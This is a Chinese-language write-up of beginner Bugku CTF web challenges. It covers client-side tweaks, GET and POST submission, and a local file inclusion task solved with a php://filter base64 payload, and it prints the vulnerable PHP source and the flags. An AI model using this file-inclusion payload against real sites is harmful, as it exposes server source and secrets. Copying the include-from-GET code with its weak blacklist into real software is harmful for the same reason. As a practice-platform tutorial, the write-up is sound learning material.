web2
打开之后是乱飞的滑稽,右键发现是一张图片,然后果断F12找到flag
计算器
开始发现是计算题目,但是输入答案只能输入一位数字。
F12
发现maxlength的值是1,所以更改maxlength的值输入正确答案即可
web基础$_GET
打开发现
用get方式提交数据即可
PHP中get方式提交数据的知识点:
菜鸟教程
web基础$_POST
打开发现是要用post的方式提交数据
用火狐的hackbar(Max HackBar也行)插件可以用post的方式提交数据
PHP中post方式提交数据的知识点:
菜鸟教程
flag在index里
click了之后
看到url里面有【file】关键字,想到文件包含
?file=php://filter/read=convert.base64-encode/resource=index.php
得到base64编码的一串字符,解码
<html>
<title>Bugku-ctf</title>
<?php
error_reporting(0);
if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag:flag{edulcni_elif_lacol_si_siht}
?>
</html>
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
strstr()和stristr()函数限制了变量中不能出现的字符串